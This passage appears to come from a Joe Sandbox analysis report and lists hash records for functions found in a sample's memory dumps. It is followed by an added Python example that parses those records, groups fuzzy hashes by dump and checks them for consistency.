• Opcode Fuzzy Hash: e326f9deb4fc4b8c420ff1b3bb9f398bd55b0302fcd0571ac691bcfdf3df834c
• Instruction Fuzzy Hash: 4931D232B1AA4E4FDB54EBA888B50FDBBB1FF59251F4402FAD05AD36F2DD2429058740

Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e56fd61cce201dac00687ff76f0058344fd71e13231a19727c836717558ae074
• Instruction ID: d64bff0a3ad8633b81b87d66e5186e4442021c9f99f66b0dc98c7a375435c4ff
• Opcode Fuzzy Hash: e56fd61cce201dac00687ff76f0058344fd71e13231a19727c836717558ae074
• Instruction Fuzzy Hash: 55514721B0EA8A0FE366A77C48665793BE1DF8621570941FBD08CC71EBDD189C438352

Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29ddd776d2dbe913a17473041e7d02223b22204b402a64c1f8219eab31bc2c79
• Instruction ID: c9f9c2285ebc2dd151f38c65c746416ea4bd32492746505ea3839753dde445e0
• Opcode Fuzzy Hash: 29ddd776d2dbe913a17473041e7d02223b22204b402a64c1f8219eab31bc2c79
• Instruction Fuzzy Hash: 4731C221B1C94D0FE798EB6C886A779B6C2EF99315F4501BEE00EC32EBDD64AC418341

Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6377afa7b6e072cd911b771a372121d9f419ea47807e857c6b395d78404c147b
• Instruction ID: ef4b4cc84f606ee63085262efc9774e7b6ec1f281ec3d76b26d9d9b77cabc3fd
• Opcode Fuzzy Hash: 6377afa7b6e072cd911b771a372121d9f419ea47807e857c6b395d78404c147b
• Instruction Fuzzy Hash: CF31C321B19E0D4FE794BBAC58697BDB7D2EF98611F1402BAE00DC32D7DD2869018792
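The function records above are what an analyst pivots on when comparing this sample's in-memory code against other submissions (Opcode ID / Instruction ID for exact matches, the fuzzy hashes for near matches). Pulling them out of the report text by hand does not scale, so the following added example (not Joe Sandbox code, and not part of this report) parses "Memory Dump Source" records of exactly the shape shown into dictionaries, groups the Instruction Fuzzy Hashes per memory dump, and runs the sanity checks that hold for every record on this page: Opcode ID equals Opcode Fuzzy Hash, the IDs are 64 hex digits, a String ID is always paired with an API String ID, and the first dotted field of the dump name read as hex (00000010, 00000011) matches the process number in the snapshot file name (hcaresult_16, hcaresult_17) while the dump offset matches its base address. Those last two correlations are observations from this report, not documented Joe Sandbox naming rules, and the three sample records embedded in the code are copied from the listing above.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records into rows.

Added example for this report page; it is not Joe Sandbox tooling.
"""
import re
from collections import defaultdict

# Constructed sample input: three records copied from the report above,
# including the bare "Strings" label lines that precede some of them.
SAMPLE = """\
Memory Dump Source
• Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
• Instruction ID: d0906da9b39b0cab91528258c5f228e1e77b1464a7a356e435750e707c5741fd
• Opcode Fuzzy Hash: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
• Instruction Fuzzy Hash: 2431F615B18A094FE794BBBC58697BDB6D2EFD8711F1402BAE00DC32DBDE286D414382
Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214
• Opcode ID: 04f150e50e2ea0365bd974b98928e19542a3af90f1147f8276e65596dc7866fb
• Instruction ID: 98c0feddc7ce07cd6deb698d698e54be86566b178fb512a11c45be0531c2a176
• Opcode Fuzzy Hash: 04f150e50e2ea0365bd974b98928e19542a3af90f1147f8276e65596dc7866fb
• Instruction Fuzzy Hash: C052B821B19A494FE768EB7884B5ABD77D2FF98301F4506BDE01EC32E6DD3868418741
Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: V
• API String ID: 0-1342839628
• Opcode ID: 14f23b97031294d16da545dd3846cd271c635606ab792a0b211a7985ba4f9a3f
• Instruction ID: 347741754c34c1e8c3d1f204562b3db8a785afa2e13db657d4c46e854b344eb4
• Opcode Fuzzy Hash: 14f23b97031294d16da545dd3846cd271c635606ab792a0b211a7985ba4f9a3f
• Instruction Fuzzy Hash: 5F019E10A1DF850FE756A73858B55757FE0CFC1216B0805FBE888CA0F7E8186A448391
"""

# "• Label: value" lines; the value may be empty (API ID, String ID, ...).
FIELD_RE = re.compile(r"^\s*•\s*([^:]+?):\s*(.*?)\s*$")
# "<dump>.sdmp, Offset: <hex>, based on PE: true|false"
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
# "hcaresult_<proc>_<run>_<base>_<label>.jbxd" (shape taken from this report)
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<proc>\d+)_(?P<run>\d+)_(?P<base>[0-9a-f]+)_")


def parse_records(text):
    """One dict per 'Memory Dump Source' record; bare labels are skipped."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return records


def split_source(source_value):
    """Break the Source File value into dump name, base address and PE flag."""
    m = SOURCE_RE.match(source_value)
    if not m:
        raise ValueError(f"unrecognised Source File value: {source_value!r}")
    first_field = m.group("file").split(".")[0]
    return {
        "file": m.group("file"),
        # Observed in this report: 00000010 -> hcaresult_16, 00000011 -> hcaresult_17
        "process_index": int(first_field, 16),
        "base": int(m.group("offset"), 16),
        "based_on_pe": m.group("pe") == "true",
    }


def check_record(rec):
    """Return a list of consistency problems; an empty list means the record is sane."""
    problems = []
    src = split_source(rec["Source File"])
    snap = SNAPSHOT_RE.match(rec["Snapshot File"])
    if not snap:
        problems.append("unparseable Snapshot File name")
    else:
        if int(snap.group("proc")) != src["process_index"]:
            problems.append("snapshot process number != dump process index")
        if int(snap.group("base"), 16) != src["base"]:
            problems.append("snapshot base != dump offset")
    if rec["Opcode ID"] != rec["Opcode Fuzzy Hash"]:
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    for key in ("Opcode ID", "Instruction ID"):
        if not re.fullmatch(r"[0-9a-f]{64}", rec[key]):
            problems.append(f"{key} is not a 64-hex-digit value")
    if bool(rec["String ID"]) != bool(rec["API String ID"]):
        problems.append("String ID and API String ID must both be set or both empty")
    return problems


def group_by_dump(records):
    """Map each memory dump file to the set of Instruction Fuzzy Hashes found in it."""
    groups = defaultdict(set)
    for rec in records:
        groups[split_source(rec["Source File"])["file"]].add(rec["Instruction Fuzzy Hash"])
    return dict(groups)


def records_with_strings(records):
    """Records that reference a string (the ones the report flags with 'Strings')."""
    return [r for r in records if r["String ID"]]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["Snapshot File"], r["String ID"] or "-", check_record(r) or "ok")
    for dump, hashes in group_by_dump(recs).items():
        print(dump, len(hashes), "function(s)")
```

Feed the whole "Memory Dump Source" section of a report into parse_records and any non-empty list from check_record marks a record whose extraction went wrong (a truncated hash, a mismatched dump/snapshot pair) before its hashes are loaded into a similarity index.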